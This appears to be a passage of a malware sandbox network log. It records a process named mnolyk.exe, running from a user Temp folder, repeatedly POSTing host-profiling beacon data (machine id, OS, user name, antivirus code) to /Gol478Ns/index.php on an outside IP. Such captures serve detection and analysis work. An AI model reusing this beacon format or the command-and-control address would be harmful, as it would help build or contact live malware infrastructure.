Feb 7, 2023 20:02:10.958776951 CET	418	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
278	192.168.2.6	50001	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:11.159822941 CET	419	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:11.227298975 CET	419	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
279	192.168.2.6	50002	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:11.408989906 CET	420	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:11.471474886 CET	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.6	49746	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:57.646912098 CET	133	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:57.712091923 CET	133	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
280	192.168.2.6	50003	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:11.648731947 CET	421	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:11.713573933 CET	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
281	192.168.2.6	50004	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:11.893867016 CET	422	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:11.959650040 CET	422	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
282	192.168.2.6	50005	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:12.152879953 CET	423	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:12.220577955 CET	423	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
283	192.168.2.6	50006	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:12.401268005 CET	424	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:12.465497971 CET	424	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
284	192.168.2.6	50007	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:12.669390917 CET	425	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:12.732749939 CET	425	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
285	192.168.2.6	50008	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:12.917279959 CET	426	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:12.980612993 CET	426	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
286	192.168.2.6	50009	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:13.165565968 CET	427	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:13.231556892 CET	427	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
287	192.168.2.6	50010	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:13.422324896 CET	428	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:13.486661911 CET	428	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
288	192.168.2.6	50011	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:13.661822081 CET	429	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:13.727159977 CET	429	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
289	192.168.2.6	50012	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:13.968224049 CET	430	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:14.033350945 CET	430	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.6	49747	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:57.887103081 CET	134	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:57.949150085 CET	134	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
290	192.168.2.6	50013	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:14.205368042 CET	431	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:14.271131992 CET	431	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
291	192.168.2.6	50014	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:14.441730022 CET	432	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:14.504437923 CET	432	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
292	192.168.2.6	50015	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:14.676485062 CET	433	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:14.743518114 CET	433	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
293	192.168.2.6	50016	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:14.953403950 CET	434	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:15.018220901 CET	434	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
294	192.168.2.6	50017	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:15.190910101 CET	435	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:15.258924961 CET	435	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
295	192.168.2.6	50018	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:15.452445030 CET	436	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:15.518418074 CET	436	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
296	192.168.2.6	50019	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:15.689584017 CET	437	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:15.753391027 CET	437	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
297	192.168.2.6	50020	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
